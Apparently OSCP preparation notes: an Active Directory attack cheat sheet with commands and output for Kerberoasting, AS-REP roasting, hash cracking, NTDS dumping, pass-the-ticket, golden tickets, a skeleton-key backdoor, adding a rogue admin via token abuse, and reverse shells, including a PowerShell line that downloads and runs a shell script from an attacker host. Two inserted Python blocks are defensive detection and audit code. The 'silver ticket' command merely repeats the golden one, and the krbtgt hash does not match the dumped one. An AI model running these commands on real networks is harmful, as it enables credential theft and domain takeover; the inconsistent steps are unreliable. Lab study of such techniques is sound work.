WIP...
Here we go...
A collection of commands for AD enumeration and exploitation for OSCP preparation.
User Enumeration
Enumerate users for domain CONTROLLER.local on DC CONTROLLER.local
kerbrute userenum --dc CONTROLLER.local -d CONTROLLER.local /usr/share/wordlists/User.txt
Ticket harvesting and Password Bruteforcing
Capture TGTs sent to the KDC every 30 seconds
Rubeus.exe harvest /interval:30
User : CONTROLLER-1$@CONTROLLER.LOCAL
StartTime : 2/7/2022 11:39:25 AM
EndTime : 2/7/2022 9:39:25 PM
RenewTill : 2/14/2022 11:39:25 AM
Flags : name_canonicalize, pre_authent, initial, renewable, forwardable
Base64EncodedTicket :
doIFhDCCBYCgAwIBBaEDAgEWooIEeDCCBHRhggRwMIIEbKADAgEFoRIbEENPTlRST0xMRVIuTE9DQUyiJTAjoAMCAQKhHDAaGwZr
...
MTkzOTI1WqgSGxBDT05UUk9MTEVSLkxPQ0FMqSUwI6ADAgECoRwwGhsGa3JidGd0GxBDT05UUk9MTEVSLkxPQ0FM
Password spraying
Rubeus.exe brute /password:Password1 /noticket
Kerberoasting
Kerberoasting allows any authenticated domain user to request a service ticket for any service with a registered SPN; the ticket is encrypted with the service account's key, so it can be cracked offline.
Tools I can use:
- BloodHound
- kekeo
- Invoke-Kerberoast
- Rubeus
- Impacket
It really is that simple
> Rubeus.exe kerberoast
______ _
(_____ \ | |
_____) )_ _| |__ _____ _ _ ___
| __ /| | | | _ \| ___ | | | |/___)
| | \ \| |_| | |_) ) ____| |_| |___ |
|_| |_|____/|____/|_____)____/(___/
v1.5.0
[*] Action: Kerberoasting
[*] NOTICE: AES hashes will be returned for AES-enabled accounts.
[*] Use /ticket:X or /tgtdeleg to force RC4_HMAC for these accounts.
[*] Searching the current domain for Kerberoastable users
[*] Total kerberoastable users : 2
[*] SamAccountName : SQLService
[*] DistinguishedName : CN=SQLService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/SQLService.CONTROLLER.local:30111
[*] PwdLastSet : 5/25/2020 10:28:26 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*SQLService$CONTROLLER.local$CONTROLLER-1/SQLService.CONTROLLER.loca
l:30111*$206D1C13CC0B38A9BB6B7673E8BF8CBD$75C2C23607C1DB9C09872722E6915807DD3508
...
E508230C3992BE14AA1ABED9488232E91B26EE5E57648E2A986D983DD1
[*] SamAccountName : HTTPService
[*] DistinguishedName : CN=HTTPService,CN=Users,DC=CONTROLLER,DC=local
[*] ServicePrincipalName : CONTROLLER-1/HTTPService.CONTROLLER.local:30222
[*] PwdLastSet : 5/25/2020 10:39:17 PM
[*] Supported ETypes : RC4_HMAC_DEFAULT
[*] Hash : $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.lo
cal:30222*$E704E9062B95E26AAE90DDD17AB00AFA$1EC0CB52D58766E91D142824911B86C72D71...
71299289062322C30A52854EA559A45F96CB0DFB1694A6255FFD00A4E4FACD4C1FA7A421BF2371E
7ACB0A385170191F06F194D62D8CD6D906A873985B96467F39ABD3DAF6F9
We can also use Impacket from a remote host to get the hashes
└─$ python2 GetUserSPNs.py controller.local/Machine1:Password1 -dc-ip 10.10.216.129 -request
Impacket v0.9.19 - Copyright 2019 SecureAuth Corporation
ServicePrincipalName Name MemberOf PasswordLastSet LastLogon
----------------------------------------------- ----------- --------------------------------------------------------------- ------------------- -------------------
CONTROLLER-1/SQLService.CONTROLLER.local:30111 SQLService CN=Group Policy Creator Owners,OU=Groups,DC=CONTROLLER,DC=local 2020-05-25 18:28:26 2020-05-25 18:46:42
CONTROLLER-1/HTTPService.CONTROLLER.local:30222 HTTPService 2020-05-25 18:39:17 2020-05-25 18:40:14
$krb5tgs$23$*HTTPService$CONTROLLER.LOCAL$CONTROLLER-1/HTTPService.CONTROLLER.local~30222*$edbe3a2b24df4573d6821395c197c0cd$...
$krb5tgs$23$*SQLService$CONTROLLER.LOCAL$CONTROLLER-1/SQLService.CONTROLLER.local~30111*$7c05198e5d3dbd2432103de303460084$...
Now crack the hash
└─$ hashcat -m 13100 -a 0 http_service.hash Pass.txt
hashcat (v6.1.1) starting...
$krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLER-1/HTTPService.CONTROLLER.local:30222*$e704e9062b95e26aae90ddd17ab00afa$...:Summer2020
Session..........: hashcat
Status...........: Cracked
Hash.Name........: Kerberos 5, etype 23, TGS-REP
Hash.Target......: $krb5tgs$23$*HTTPService$CONTROLLER.local$CONTROLLE...daf6f9
Time.Started.....: Mon Feb 7 15:34:26 2022 (0 secs)
Time.Estimated...: Mon Feb 7 15:34:26 2022 (0 secs)
Guess.Base.......: File (Pass.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........: 236.6 kH/s (1.28ms) @ Accel:32 Loops:1 Thr:64 Vec:8
Recovered........: 1/1 (100.00%) Digests
Progress.........: 1240/1240 (100.00%)
Rejected.........: 0/1240 (0.00%)
Restore.Point....: 0/1240 (0.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidates.#1....: 123456 -> hello123
AS-REP Roasting
Similar to Kerberoasting, AS-REP Roasting dumps the krb5asrep hash of user accounts that have Kerberos pre-authentication disabled, which means those users don't need to be service accounts.
Rubeus.exe asreproast
[*] Action: AS-REP roasting
[*] Target Domain : CONTROLLER.local
[*] Searching path 'LDAP://CONTROLLER-1.CONTROLLER.local/DC=CONTROLLER,DC=local' for AS-REP roastable users
[*] SamAccountName : Admin2
[*] DistinguishedName : CN=Admin-2,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::e05e:1173:33f7:7c9%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\Admin2'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$Admin2@CONTROLLER.local:3C51D07F1843F12D66E4BBB233C09CE3$795884C015C4
574540500F23BF6F07D4962505A2DFC15F45E3F9FDE5596024E9C5E92D0B089581817FAFD6B7F479
3AE38258DDACFBB373D26227229F9F1EC3885855FA5A7C57180C385281A565D6F245CF02E9B48CE9
2428147580353F9E337F0002F6C7D86FA054F6E5F4FE1022EF897F1CCEE8FB118D7AFCE5D83AB816
3CC4CC1A66918FC402ECE66233CCDD33FA646FC333248CABC280F9FF83EA0CFBA36FE93681C3B8B8
5CF8069493053A6216CD5A2EFCD1A60328CA8B5CAE00264FB6D561CDA1535C6BD68B293E5E6FD4C4
F22708D78352E1DA494134A28F600D9354C97B1DC1341B50344E05D53D1811BB3B9A4A7EA62D
[*] SamAccountName : User3
[*] DistinguishedName : CN=User-3,CN=Users,DC=CONTROLLER,DC=local
[*] Using domain controller: CONTROLLER-1.CONTROLLER.local (fe80::e05e:1173:33f7:7c9%5)
[*] Building AS-REQ (w/o preauth) for: 'CONTROLLER.local\User3'
[+] AS-REQ w/o preauth successful!
[*] AS-REP hash:
$krb5asrep$User3@CONTROLLER.local:CA336057CAD77194863CD97401A4B06A$328EC569B6006
B60093AD9B47EC31AAAAF5725DADFF587AC393521389AEC08A695B92824B9975312931292D58F68C
C18E1A81B883B0B4CFCE5A68CFF24D7772B183F893CA763A7644D5D26A1475C7EAA2E443CADBE727
D98B4075A0E44805B55AAF6A23E78821B38F9DB831CF14D636EAD35C0139965A4819A2723C375EA9
DDBF4ADE7DA54DE4F176F49981938EF496A55F83DEFEEC30B6BB72F70F0720F8E92D8A8A9E0F5D3E
27306C9D6309AAA8FCA49B1D6ED714FEC746A4AA6EF53DC364C5491405F469DF288FE038AE8EB0E3
D8BB5A6DB13822F4ACDFC7F65D43F9DE8AFB693CA19CB747AEF92BFDF8451E80826669FFCC3
IMPORTANT: insert 23$ after $krb5asrep$ so that the first line reads $krb5asrep$23$User... (the format hashcat mode 18200 expects), otherwise the hash will not be recognised.
Then crack the hash using hashcat -m 18200 hash.txt Pass.txt
We can also achieve the same with Impacket.
python3 impacket/examples/GetNPUsers.py spookysec.local/svc-admin -dc-ip 10.10.253.53
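The defender's view of the two roasting runs above (Kerberoasting and AS-REP roasting): a triage over Kerberos audit events from the DC. This is an added example, not code from the original notes or from Rubeus/Impacket; it assumes events already parsed into dicts with the Windows Security-log field names, and the sample records and the 10.10.0.50 address are constructed.

```python
"""Triage Kerberos DC audit events for the two roasting techniques above.

Added example, not part of the original notes or of Rubeus/Impacket. It assumes
Security-log events already parsed into dicts keyed by the Windows field names
(4769 = service ticket request, 4768 = TGT request) with numeric values; every
record in SAMPLE_EVENTS is constructed, not real telemetry.
"""
from collections import defaultdict

RC4_HMAC = 0x17  # etype 23: the cipher behind the $krb5tgs$23$ / $krb5asrep$23$ hashes

def is_kerberoast_indicator(ev):
    """4769 issued with RC4 for a user (not machine, not krbtgt) service account."""
    if ev["EventID"] != 4769 or ev["Status"] != 0x0:
        return False
    svc = ev["ServiceName"]
    if svc.endswith("$") or svc.lower() == "krbtgt":
        return False  # machine accounts and TGT renewals are normal noise
    return ev["TicketEncryptionType"] == RC4_HMAC

def is_asrep_roast_indicator(ev):
    """4768 with no pre-authentication (PreAuthType 0) and an RC4 ticket."""
    return (ev["EventID"] == 4768 and ev["PreAuthType"] == 0
            and ev["TicketEncryptionType"] == RC4_HMAC)

def triage(events, spn_threshold=2):
    """Group RC4 service-ticket requests per (requester, source IP) and list the
    accounts whose TGT was issued without pre-auth. One requester pulling several
    SPNs at once is the signature of a bulk 'kerberoast' run like the one above."""
    per_requester = defaultdict(set)
    asrep = set()
    for ev in events:
        if is_kerberoast_indicator(ev):
            per_requester[(ev["TargetUserName"], ev["IpAddress"])].add(ev["ServiceName"])
        elif is_asrep_roast_indicator(ev):
            asrep.add(ev["TargetUserName"])
    bursts = {k: sorted(v) for k, v in per_requester.items() if len(v) >= spn_threshold}
    return {"kerberoast_bursts": bursts, "asrep_roastable": sorted(asrep)}

# Constructed sample: one benign AES machine-account ticket, the two RC4 service
# tickets and two no-preauth TGTs the runs above would leave behind, and a normal
# pre-authenticated logon. 10.10.0.50 is an assumed attacker-host address.
SAMPLE_EVENTS = [
    {"EventID": 4769, "TargetUserName": "CONTROLLER-1$", "ServiceName": "CONTROLLER-1$",
     "TicketEncryptionType": 0x12, "Status": 0x0, "IpAddress": "10.10.216.129"},
    {"EventID": 4769, "TargetUserName": "Machine1", "ServiceName": "SQLService",
     "TicketEncryptionType": RC4_HMAC, "Status": 0x0, "IpAddress": "10.10.0.50"},
    {"EventID": 4769, "TargetUserName": "Machine1", "ServiceName": "HTTPService",
     "TicketEncryptionType": RC4_HMAC, "Status": 0x0, "IpAddress": "10.10.0.50"},
    {"EventID": 4768, "TargetUserName": "Admin2", "PreAuthType": 0,
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.0.50"},
    {"EventID": 4768, "TargetUserName": "User3", "PreAuthType": 0,
     "TicketEncryptionType": RC4_HMAC, "IpAddress": "10.10.0.50"},
    {"EventID": 4768, "TargetUserName": "Administrator", "PreAuthType": 2,
     "TicketEncryptionType": 0x12, "IpAddress": "10.10.216.129"},
]
```

Enforcing AES-only on service accounts and enabling pre-authentication removes both indicators at the source; the RC4 etype check is what separates a roasting run from normal ticket traffic.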
Dump Password hashes
└─$ python3 impacket/examples/secretsdump.py backup:backup2517860@spookysec.local
Impacket v0.9.25.dev1+20220331.224942.eb283663 - Copyright 2021 SecureAuth Corporation
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:0e0363213e37b94221497260b0bcb4fc:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:0e2eb8158c27bed09861033026be4c21:::
spookysec.local\skidy:1103:aad3b435b51404eeaad3b435b51404ee:5fe9353d4b96cc410b62cb7e11c57ba4:::
Pass the ticket
For this attack we'll be using Mimikatz which allows us to dump the TGT from LSASS memory.
controller\administrator@CONTROLLER-1 C:\Users\Administrator\Downloads>mimikatz.exe
.#####. mimikatz 2.2.0 (x64) #19041 May 19 2020 00:48:59
.## ^ ##. "A La Vie, A L'Amour" - (oe.eo)
## / \ ## /*** Benjamin DELPY `gentilkiwi` ( benjamin@gentilkiwi.com )
## \ / ## > http://blog.gentilkiwi.com/mimikatz
'## v ##' Vincent LE TOUX ( vincent.letoux@gmail.com )
'#####' > http://pingcastle.com / http://mysmartlogon.com ***/
If this command does not return Privilege '20' OK, you do not have the administrator privileges needed to run mimikatz properly.
mimikatz # privilege::debug
Privilege '20' OK
mimikatz # sekurlsa::tickets /export
Authentication Id : 0 ; 1202421 (00000000:001258f5)
Session : NetworkCleartext from 0
User Name : Administrator
Domain : CONTROLLER
Logon Server : CONTROLLER-1
Logon Time : 2/8/2022 8:38:42 AM
SID : S-1-5-21-432953485-3795405108-1502158860-500
* Username : Administrator
* Domain : CONTROLLER.LOCAL
* Password : (null)
Group 0 - Ticket Granting Service
Group 1 - Client Ticket ?
Group 2 - Ticket Granting Ticket
[00000000]
Start/End/MaxRenew: 2/8/2022 8:38:42 AM ; 2/8/2022 6:38:42 PM ; 2/15/2022 8:38:42 AM
Service Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
Target Name (02) : krbtgt ; CONTROLLER.LOCAL ; @ CONTROLLER.LOCAL
Client Name (01) : Administrator ; @ CONTROLLER.LOCAL ( CONTROLLER.LOCAL )
Flags 40e10000 : name_canonicalize ; pre_authent ; initial ; renewable ; forwardable ;
Session Key : 0x00000012 - aes256_hmac
5a88b21f145c0e23bc1a9b3ea3506d987cff9a338de6360de24dc6112a85b49e
Ticket : 0x00000012 - aes256_hmac ; kvno = 2 [...]
* Saved to file [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi !
This will dump all the captured .kirbi tickets to the current directory
02/08/2022 09:12 AM <DIR> .
02/08/2022 09:12 AM <DIR> ..
05/25/2020 02:45 PM 1,263,880 mimikatz.exe
05/25/2020 02:14 PM 212,480 Rubeus.exe
02/08/2022 09:12 AM 1,595 [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,787 [0;18e8aa]-1-0-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,587 [0;27833a]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,755 [0;36502]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,587 [0;3691f]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,791 [0;3e4]-0-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,587 [0;3e4]-2-0-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,755 [0;3e7]-0-0-40a50000-CONTROLLER-1$@HTTP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,787 [0;3e7]-0-1-40a50000-CONTROLLER-1$@GC-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,721 [0;3e7]-0-2-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.kirbi
02/08/2022 09:12 AM 1,711 [0;3e7]-0-3-40a50000.kirbi
02/08/2022 09:12 AM 1,791 [0;3e7]-0-4-40a50000-CONTROLLER-1$@cifs-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,791 [0;3e7]-0-5-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,721 [0;3e7]-0-6-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.kirbi
02/08/2022 09:12 AM 1,755 [0;3e7]-0-7-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,647 [0;3e7]-1-0-00a50000.kirbi
02/08/2022 09:12 AM 1,587 [0;3e7]-2-0-60a10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,587 [0;3e7]-2-1-40e10000-CONTROLLER-1$@krbtgt-CONTROLLER.LOCAL.kirbi
02/08/2022 09:12 AM 1,755 [0;5646d]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,755 [0;564c9]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,791 [0;56505]-1-0-40a50000-CONTROLLER-1$@LDAP-CONTROLLER-1.CONTROLLER.local.kirbi
02/08/2022 09:12 AM 1,755 [0;5653e]-1-0-40a50000-CONTROLLER-1$@ldap-CONTROLLER-1.CONTROLLER.local.kirbi
With those we can pass the ticket and impersonate the admin
mimikatz # kerberos::ptt [0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi
* File: '[0;1258f5]-2-0-40e10000-Administrator@krbtgt-CONTROLLER.LOCAL.kirbi': OK
To verify we can use klist
klist
Current LogonId is 0:0x1258f5
Cached Tickets: (1)
#0> Client: Administrator @ CONTROLLER.LOCAL
Server: krbtgt/CONTROLLER.LOCAL @ CONTROLLER.LOCAL
KerbTicket Encryption Type: AES-256-CTS-HMAC-SHA1-96
Ticket Flags 0x40e10000 -> forwardable renewable initial pre_authent name_canonicalize
Start Time: 2/8/2022 8:38:42 (local)
End Time: 2/8/2022 18:38:42 (local)
Renew Time: 2/15/2022 8:38:42 (local)
Session Key Type: AES-256-CTS-HMAC-SHA1-96
Cache Flags: 0x1 -> PRIMARY
Kdc Called:
Golden Ticket/Silver Ticket Attacks
If staying undetected matters, a silver ticket is the better option: it is limited to the targeted service, whereas a golden ticket grants access to any Kerberos service.
Dumping the krbtgt hash
mimikatz # lsadump::lsa /inject /name:krbtgt
Domain : CONTROLLER / S-1-5-21-432953485-3795405108-1502158860
RID : 000001f6 (502)
User : krbtgt
* Primary
NTLM : 72cd714611b64cd4d5550cd2759db3f6
LM :
Hash NTLM: 72cd714611b64cd4d5550cd2759db3f6
ntlm- 0: 72cd714611b64cd4d5550cd2759db3f6
lm - 0: aec7e106ddd23b3928f7b530f60df4b6
Creating a golden/silver ticket
Golden Ticket
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:d01d6ccf97a2ee214ec7185173a3b659 /id:1103
Silver Ticket
mimikatz # Kerberos::golden /user:Administrator /domain:controller.local /sid:S-1-5-21-432953485-3795405108-1502158860 /krbtgt:d01d6ccf97a2ee214ec7185173a3b659 /id:1103
We can now open an elevated command prompt with misc::cmd
Backdooring Kerberos
We can implant a mimikatz skeleton key and abuse the way AS-REQ works when RC4 ciphers are in use.
The default mimikatz skeleton key hash is 60BA4FCADC466C7A033C178194C03DF6, which corresponds to the password "mimikatz".
misc::skeleton
That's it... That's how you backdoor a Microsoft authentication service. I know it's RC4 but still! This is amazing!!!!
Now we can view network shares using
net use \\DOMAIN-CONTROLLER\admin$ /user:Administrator mimikatz
SMB
Enumerate with nmap
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse 10.10.232.66
List share files
smbclient //10.10.232.66/anonymous
Recursively download files
smbget -R smb://<ip>/anonymous
Privesc
Unquoted service path
Download
certutil.exe -urlcache -split -f http://10.8.49.147:1337/PowerUp.ps1 PowerUp.ps1
Load and execute
PS C:\tmp> . .\PowerUp.ps1
PS C:\tmp> Invoke-AllChecks
Windows resolves an unquoted service path one space at a time, appending ".exe" to each prefix before trying the full path. Generate a reverse shell with the name of the path segment before the first space: for
c:\users\admin\my service\bin\start.exe
the first file Windows looks for is
c:\users\admin\my.exe
Restart service
net stop servicename
net start servicename
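The lookup order described above, replayed as an audit that lists which services need their ImagePath quoted and which directories' write ACLs to verify. This is an added example, not code from the notes or from PowerUp; the SAMPLE_SERVICES entries are constructed (only the first is the path from the notes) and each value is assumed to be the bare executable path without arguments.

```python
"""Audit service ImagePath values for the unquoted-path weakness described above.

Added example, not from the original notes or from PowerUp. It replays the
CreateProcess search order in pure Python so it can be checked offline; the
SAMPLE_SERVICES values are constructed (only the first one is the path from the
notes) and each value is assumed to be the bare executable path, without
arguments. On a real host the input is each service's ImagePath from
HKLM\\SYSTEM\\CurrentControlSet\\Services.
"""
import ntpath

def candidate_executables(image_path):
    """Files Windows tries, in order, for an unquoted path containing spaces:
    every prefix that ends just before a space gets '.exe' appended, and the
    full path is tried last. A quoted path yields only the real binary."""
    path = image_path.strip()
    if path.startswith('"'):
        return [path[1:path.index('"', 1)]]
    parts = path.split(" ")
    candidates = [" ".join(parts[:i]) + ".exe" for i in range(1, len(parts))]
    candidates.append(path)
    return candidates

def needs_quoting(image_path):
    """True when the path is unquoted and contains at least one space."""
    path = image_path.strip()
    return not path.startswith('"') and " " in path

def audit(services):
    """services maps service name -> ImagePath. For each vulnerable entry return
    the lookup order, the directories whose ACL must deny writes to ordinary
    users (the hijack points), and the quoted path that removes the issue."""
    findings = {}
    for name, image_path in services.items():
        if not needs_quoting(image_path):
            continue
        cands = candidate_executables(image_path)
        dirs = sorted({ntpath.dirname(c) for c in cands[:-1]}, key=str.lower)
        findings[name] = {
            "tries": cands,
            "check_write_acl_on": dirs,
            "fix": '"%s"' % image_path.strip(),
        }
    return findings

# Constructed sample: the path from the notes above, two safe entries, and one
# more unquoted path under Program Files.
SAMPLE_SERVICES = {
    "MyService": r"c:\users\admin\my service\bin\start.exe",
    "Spooler": r"C:\Windows\System32\spoolsv.exe",              # no space: not affected
    "Jenkins": r'"C:\Program Files (x86)\Jenkins\jenkins.exe"',  # quoted: not affected
    "Updater": r"C:\Program Files\Acme Tools\svc host.exe",
}

if __name__ == "__main__":
    for svc, finding in audit(SAMPLE_SERVICES).items():
        print(svc, finding["tries"][0], "->", finding["fix"])
```

The fix is the quoted path in each finding; the audit only flags an issue when a listed directory is writable by non-administrators.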
Token impersonation
There are two types of access tokens:
- primary access tokens: those associated with a user account that are generated on log on
- impersonation tokens: these allow a particular process (or thread in a process) to gain access to resources using the token of another (user/client) process
For an impersonation token, there are different levels:
- SecurityAnonymous: current user/client cannot impersonate another user/client
- SecurityIdentification: current user/client can get the identity and privileges of a client, but cannot impersonate the client
- SecurityImpersonation: current user/client can impersonate the client's security context on the local system
- SecurityDelegation: current user/client can impersonate the client's security context on a remote system
where the security context is a data structure that contains the user's relevant security information.
The privileges of an account (which are either granted when the account is created or inherited from a group) allow a user to carry out particular actions.
Here are the most commonly abused privileges:
- SeImpersonatePrivilege
- SeAssignPrimaryTokenPrivilege
- SeTcbPrivilege
- SeBackupPrivilege
- SeRestorePrivilege
- SeCreateTokenPrivilege
- SeLoadDriverPrivilege
- SeTakeOwnershipPrivilege
- SeDebugPrivilege
View privileges
whoami /priv
Impersonation with Invoke-TokenManipulation.ps1
. .\Invoke-TokenManipulation.ps1
PS C:\Program Files (x86)\Jenkins> Invoke-TokenManipulation -Enumerate
Incognito also looks nice
PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe list_tokens -g"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Listing unique users found
PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe add_user xnull password"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user xnull to host 127.0.0.1
[+] Successfully added user
PS C:\Program Files (x86)\Jenkins> cmd.exe /c "incognito.exe add_localgroup_user Administrators xnull"
[-] WARNING: Not running as SYSTEM. Not all tokens will be available.
[*] Enumerating tokens
[*] Attempting to add user xnull to local group Administrators on host 127.0.0.1
[+] Successfully added user to local group
PS C:\Program Files (x86)\Jenkins> net user xnull
User name xnull
Full Name xnull
Comment
User's comment
Country code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/14/2022 9:54:21 PM
Password expires 3/28/2022 9:54:21 PM
Password changeable 2/14/2022 9:54:21 PM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon Never
Logon hours allowed All
Local Group Memberships *Administrators
Global Group memberships *None
The command completed successfully.
Then RDP into it
rdesktop -u xnull -p password 10.10.175.25
Reverse Shell
EXE using msfvenom
msfvenom -p windows/shell_reverse_tcp LHOST=tun0 LPORT=1338 -f exe -o Advanced.exe
or
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai LHOST=10.8.49.147 LPORT=1339 -f exe -o shell.exe
Powershell using PowerShellTcp
powershell iex (New-Object Net.WebClient).DownloadString('http://10.8.49.147:1338/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.8.49.147 -Port 1337
More exploitation
Can we spoof a printer?
PrintSpoofer
c:\inetpub\wwwroot\nt4wrksv>PrintSpoofer64.exe -i -c cmd
PrintSpoofer64.exe -i -c cmd
[+] Found privilege: SeImpersonatePrivilege
[+] Named pipe listening...
[+] CreateProcessAsUser() OK
Microsoft Windows [Version 10.0.14393]
(c) 2016 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system